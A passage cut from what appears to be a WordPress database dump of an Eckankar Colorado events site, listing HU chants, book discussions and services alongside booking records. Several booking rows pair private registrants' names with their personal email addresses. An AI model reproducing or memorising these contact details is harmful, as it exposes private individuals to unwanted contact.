29</span></p>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/289814725/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How to Raise Your Spiritual IQ - A Spiritual Discussion<br>Meetup - In Person','','publish','closed','closed','','meetup-in-personhow-to-raise-your-spiritual-iq-a-spiritual-discussion','','','2023-01-15 09:48:22','2023-01-15 16:48:22','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267515',0,'mec-events','',0),(267516,1000050,'2022-11-20 12:45:00','2022-11-20 19:45:00','','Sandy(Tarzana San Fernando Valley California) - sandykarlic@gmail.com','','publish','closed','closed','','sandytarzana-san-fernando-valley-california-sandykarlicgmail-com','','','2022-11-20 12:45:00','2022-11-20 19:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267516',0,'mec-books','',0),(267517,1000050,'2022-11-20 12:45:00','2022-11-20 19:45:00','','Sandy(Tarzana California) - sandykarlic@gmail.com','','publish','closed','closed','','sandytarzana-california-sandykarlicgmail-com-3','','','2022-11-20 12:45:00','2022-11-20 19:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267517',0,'mec-books','',0),(267518,1000015,'2022-11-20 12:45:00','2022-11-20 19:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-12','','','2022-11-20 12:45:00','2022-11-20 19:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267518',0,'mec-books','',0),(267520,0,'2022-11-22 14:01:40','2022-11-22 21:01:40','','','','publish','closed','closed','','267520','','','2022-11-22 14:01:40','2022-11-22 21:01:40','',0,'https://eckankar-colorado.org/nf_sub/267520/',0,'nf_sub','',0),(267532,2,'2022-11-24 09:15:04','2022-11-24 16:15:04','','winter-effects-10-J','','inherit','closed','closed','','winter-effects-10-j','','','2022-11-24 09:15:04','2022-11-24 16:15:04','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/11/winter-effects-10-J.jpg',0,'attachment','image/jpeg',0),(267539,2,'2022-11-29 10:57:59','2022-11-29 17:57:59','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e;\"><span style=\"font-size: 14pt;\"><strong>December Only - This class is meeting a week early, due to the holidays. It is usually scheduled for the fourth Sunday.</strong></span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">The ‘<em>Autobiography of a Modern Prophet</em>’ discussion began earlier in 2022 in Loveland and is now open to all. You may join the class at any time.</span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\"><span style=\"color: #cd8a0e;\"><strong>Note:</strong> </span><em>For this month\'s class, the reading assignment will be Chapters 27, 28, and 29.</em></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Discover your own spiritual greatness. “Tucked away in the hidden places of this book are clues as to how you too may reach the glories of God,” says Sri Harold Klemp.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Autobiography of a Modern Prophet is a special compilation of Sri Harold’s three autobiographical books—<em>The Wind of Change</em>, <em>Soul Travelers of the Far Country</em>, and <em>Child in the Wilderness</em>. He spent many hours writing new material, carefully weaving one, continuous story to help others climb the Mountain of God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-1-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e;\"><span style=\"font-size: 18pt;\"><strong>For Login Information, Please Register Below.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Book Discussion - Online<br>\'Autobiography of a Modern Prophet\'','','publish','closed','closed','','book-discussion-onlineautobiography-of-a-modern-prophet-working-waiting-for-correct-date','','','2022-12-14 11:38:24','2022-12-14 18:38:24','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267539',0,'mec-events','',0),(267550,1000055,'2022-12-18 11:45:00','2022-12-18 18:45:00','','Guy-Erne - assika@guyerne.com','','publish','closed','closed','','guy-erne-assikaguyerne-com','','','2022-12-18 11:45:00','2022-12-18 18:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267550',0,'mec-books','',0),(267551,0,'2022-11-28 12:59:32','2022-11-28 19:59:32','','','','publish','closed','closed','','267551','','','2022-11-28 12:59:32','2022-11-28 19:59:32','',0,'https://eckankar-colorado.org/nf_sub/267551/',0,'nf_sub','',0),(267554,15,'2022-12-02 16:53:44','2022-12-02 23:53:44','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you looking for creative ways to solve life\'s challenges?</span><br>\r\n<span style=\"font-size: 14pt;\">Do you want to ignite your own creativity?</span><br>\r\n<span style=\"font-size: 14pt;\">Are you ready to tune into your true self and find your own unique answers?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this service is for you. Creativity can come as a nudge, a dream, a vision, or a quiet voice within you. You will learn new ways to connect with the ever-present guidance of the Holy Spirit and create the life of your dreams.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>The Awakened Heart</em>, \"What we are trying to achieve is the upliftment of spiritual consciousness through our creative abilities.\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;Please RSVP to get the Zoom link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>God\'s Gift, Creative Imagination','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinegods-gift-creative-imagination','','','2022-12-02 16:53:44','2022-12-02 23:53:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267554',0,'mec-events','',0),(269027,1000023,'2023-09-10 10:30:00','2023-09-10 16:30:00','','Bonnie Greenstreet  - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-9','','','2023-09-10 10:30:00','2023-09-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269027',0,'mec-books','',0),(269028,1000021,'2023-09-10 10:30:00','2023-09-10 16:30:00','','Test - choll.03@comcast.net','','publish','closed','closed','','test-choll-03comcast-net-2','','','2023-09-10 10:30:00','2023-09-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269028',0,'mec-books','',0),(269029,1000061,'2023-09-10 10:30:00','2023-09-10 16:30:00','','Chukwuebuka Okwor - ocekenedili@yahoo.com','','publish','closed','closed','','chukwuebuka-okwor-ocekenediliyahoo-com-2','','','2023-09-10 10:30:00','2023-09-10 16:30:00','',0,'https://eckankar-colorado.org/mec-books/chukwuebuka-okwor-ocekenediliyahoo-com-2/',0,'mec-books','',0),(269099,0,'2023-09-18 16:56:27','2023-09-18 22:56:27','','','','publish','closed','closed','','269099','','','2023-09-18 16:56:27','2023-09-18 22:56:27','',0,'https://eckankar-colorado.org/nf_sub/269099/',0,'nf_sub','',0),(269120,0,'2023-09-27 09:27:51','2023-09-27 15:27:51','','','','publish','closed','closed','','269120','','','2023-09-27 09:27:51','2023-09-27 15:27:51','',0,'https://eckankar-colorado.org/nf_sub/269120/',0,'nf_sub','',0),(269101,0,'2023-09-19 02:21:37','2023-09-19 08:21:37','','','','publish','closed','closed','','269101','','','2023-09-19 02:21:37','2023-09-19 08:21:37','',0,'https://eckankar-colorado.org/nf_sub/269101/',0,'nf_sub','',0),(269102,0,'2023-09-19 16:29:12','2023-09-19 22:29:12','','','','publish','closed','closed','','269102','','','2023-09-19 16:29:12','2023-09-19 22:29:12','',0,'https://eckankar-colorado.org/nf_sub/269102/',0,'nf_sub','',0),(269103,0,'2023-09-19 20:10:03','2023-09-20 02:10:03','','','','publish','closed','closed','','269103','','','2023-09-19 20:10:03','2023-09-20 02:10:03','',0,'https://eckankar-colorado.org/nf_sub/269103/',0,'nf_sub','',0),(269105,0,'2023-09-21 16:14:21','2023-09-21 22:14:21','','','','publish','closed','closed','','269105','','','2023-09-21 16:14:21','2023-09-21 22:14:21','',0,'https://eckankar-colorado.org/nf_sub/269105/',0,'nf_sub','',0),(267559,0,'2022-12-08 10:42:04','2022-12-08 17:42:04','','','','publish','closed','closed','','267559','','','2022-12-08 10:42:04','2022-12-08 17:42:04','',0,'https://eckankar-colorado.org/nf_sub/267559/',0,'nf_sub','',0),(267560,1000023,'2022-12-11 10:30:00','2022-12-11 17:30:00','','Bonnie G. - bngstreet@gmail.com','','publish','closed','closed','','bonnie-g-bngstreetgmail-com-3','','','2022-12-11 10:30:00','2022-12-11 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267560',0,'mec-books','',0),(267561,1000056,'2022-12-11 10:30:00','2022-12-11 17:30:00','','Marlene Chapelle - huuu4luv@xplornet.com','','publish','closed','closed','','marlene-chapelle-huuu4luvxplornet-com','','','2022-12-11 10:30:00','2022-12-11 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267561',0,'mec-books','',0),(267562,1000022,'2022-12-11 10:30:00','2022-12-11 17:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-6','','','2022-12-11 10:30:00','2022-12-11 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267562',0,'mec-books','',0),(267563,1000022,'2022-12-11 10:30:00','2022-12-11 17:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-7','','','2022-12-11 10:30:00','2022-12-11 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267563',0,'mec-books','',0),(267564,1000050,'2022-12-18 10:30:00','2022-12-18 17:30:00','','Sandy(Tarzana California) - sandykarlic@gmail.com','','publish','closed','closed','','sandytarzana-california-sandykarlicgmail-com-4','','','2022-12-18 10:30:00','2022-12-18 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267564',0,'mec-books','',0),(267566,0,'2022-12-13 20:32:36','2022-12-14 03:32:36','','','','publish','closed','closed','','267566','','','2022-12-13 20:32:36','2022-12-14 03:32:36','',0,'https://eckankar-colorado.org/nf_sub/267566/',0,'nf_sub','',0),(267568,2,'2022-12-14 10:04:26','2022-12-14 17:04:26','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are facilitated by an ECK Spiritual Aide, a cleric and longtime member of Eckankar who is specially trained to lead these forums.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'Soul\'s Spiritual Journey\'','','publish','closed','closed','','roundtable-discussion-in-personsouls-spiritual-journey','','','2022-12-14 10:04:26','2022-12-14 17:04:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267568',0,'mec-events','',0),(267569,2,'2022-12-14 11:34:03','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 0px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\n<p class=\"\" style=\"border-width: 0px;\">&nbsp;</p>\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">The ‘<em>Autobiography of a Modern Prophet</em>’ discussion began earlier in 2022 in Loveland and is now open to all. You may join the class at any time.</span></p>\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\"><span style=\"color: #cd8a0e;\"><strong>Note:</strong> </span><em>For this month\'s class, the reading assignment will be Chapters 27, 28, and 29.</em></span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Discover your own spiritual greatness. “Tucked away in the hidden places of this book are clues as to how you too may reach the glories of God,” says Sri Harold Klemp.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Autobiography of a Modern Prophet is a special compilation of Sri Harold’s three autobiographical books—<em>The Wind of Change</em>, <em>Soul Travelers of the Far Country</em>, and <em>Child in the Wilderness</em>. He spent many hours writing new material, carefully weaving one, continuous story to help others climb the Mountain of God.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-1-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e;\"><span style=\"font-size: 18pt;\"><strong>For Login Information, Please Register Below.</strong></span></p>\n</div>\n</div>\n</div>\n</div>','Book Discussion - Online<br>\'Autobiography of a Modern Prophet\'','','draft','closed','closed','','','','','2022-12-14 11:34:03','2022-12-14 18:34:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267569',0,'mec-events','',0),(267570,2,'2022-12-14 11:42:25','2022-12-14 18:42:25','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">The ‘<em>Autobiography of a Modern Prophet</em>’ discussion began earlier in 2022 in Loveland and is now open to all. You may join the class at any time.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Discover your own spiritual greatness. “Tucked away in the hidden places of this book are clues as to how you too may reach the glories of God,” says Sri Harold Klemp.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Autobiography of a Modern Prophet is a special compilation of Sri Harold’s three autobiographical books—<em>The Wind of Change</em>, <em>Soul Travelers of the Far Country</em>, and <em>Child in the Wilderness</em>. He spent many hours writing new material, carefully weaving one, continuous story to help others climb the Mountain of God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-1-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e;\"><span style=\"font-size: 18pt;\"><strong>For Login Information, Please Register Below.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Autobiography of a Modern Prophet\'<br>Book Discussion - Online','','publish','closed','closed','','book-discussion-onlineautobiography-of-a-modern-prophet','','','2023-02-17 12:16:51','2023-02-17 19:16:51','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267570',0,'mec-events','',0),(267571,2,'2022-12-14 11:57:00','2022-12-14 18:57:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the December 2022 edition of the <em> Mystic </em><em>World</em>. Please have your copy of this issue on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <span class=\"\"><strong><a href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"noopener\">Eckankar.org</a></strong></span>, in the Members Area under \"Your Spiritual Studies.\"&nbsp;<br>\r\n<br>\r\n</span></div>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion - Online','','publish','closed','closed','','mystic-world-discussion-online-template-only-for-member-calendars','','','2022-12-14 12:01:33','2022-12-14 19:01:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267571',0,'mec-events','',0),(267573,15,'2022-12-17 11:00:46','2022-12-17 18:00:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find your own proof of the love and power of HU.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more information about HU, check out&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/290329635/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Archuleta County guidelines for all in person events in Loveland, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-7','','','2022-12-17 11:02:54','2022-12-17 18:02:54','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267573',0,'mec-events','',0),(267574,15,'2022-12-17 10:57:05','2022-12-17 17:57:05','','HU','','inherit','closed','closed','','hu','','','2022-12-17 10:57:05','2022-12-17 17:57:05','',267573,'https://eckankar-colorado.org/wp-content/uploads/2022/12/HU.webp',0,'attachment','image/webp',0),(267576,15,'2022-12-17 11:12:24','2022-12-17 18:12:24','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Finding a Spiritual Practice that is just right for you.</span></strong></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">How to connect with your true divine self in daily life?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">How to find your own answers to bring more love, wisdom, and freedom in your life?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">How to stay balanced when life seems difficult.</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">How to let go of problems and move forward with more joy, peace, and love.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are warmly invited to join in this spiritual discussion. We will be using exercises to help you gain awareness of God’s hand in you daily existence. The evening will include contemplation and discussion on how Spirit is always with you to help create the life you want to live.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, <em>ECKANKAR: Ancient Wisdom for Today</em>, “When you let God into your life, divine love also enters. Experiences and coincidences you would have discounted as trivial before now become miraculous. Life itself is rich, and you discover the joy of service and charity. God’s love awakens your heart.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290329207/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Develop a Powerful Spiritual Practice<br>Meetup - In Person','','publish','closed','closed','','meetup-in-persondevelop-a-powerful-spiritual-practice','','','2023-01-15 09:46:47','2023-01-15 16:46:47','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267576',0,'mec-events','',0),(267577,15,'2022-12-17 11:23:30','2022-12-17 18:23:30','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p><span style=\"font-size: 14pt;\">Would you like help remembering and interpreting your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Are you looking for practical help in everyday life?</span></p>\r\n<p><span style=\"font-size: 14pt;\">Would you like to boost your spiritual growth?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this service is for you. Spiritual guidance can come as a dream, a nudge, a vision, or a quiet voice within you. You will learn new ways to connect with the ever-present guidance of the Holy Spirit and create the life of your dreams.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>Eck Wisdom on Dreams</em>, “ Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;Please RSVP to get the Zoom link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Guidance and Dreams<br>ECK Light and Sound Service - In Person & Online','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinespiritual-guidance-and-dreams','','','2023-01-15 09:49:24','2023-01-15 16:49:24','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267577',0,'mec-events','',0),(267578,15,'2022-12-17 11:21:25','2022-12-17 18:21:25','','Dreams','','inherit','closed','closed','','dreams-2','','','2022-12-17 11:21:25','2022-12-17 18:21:25','',267577,'https://eckankar-colorado.org/wp-content/uploads/2022/12/Dreams.webp',0,'attachment','image/webp',0),(267579,15,'2022-12-17 11:32:26','2022-12-17 18:32:26','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your 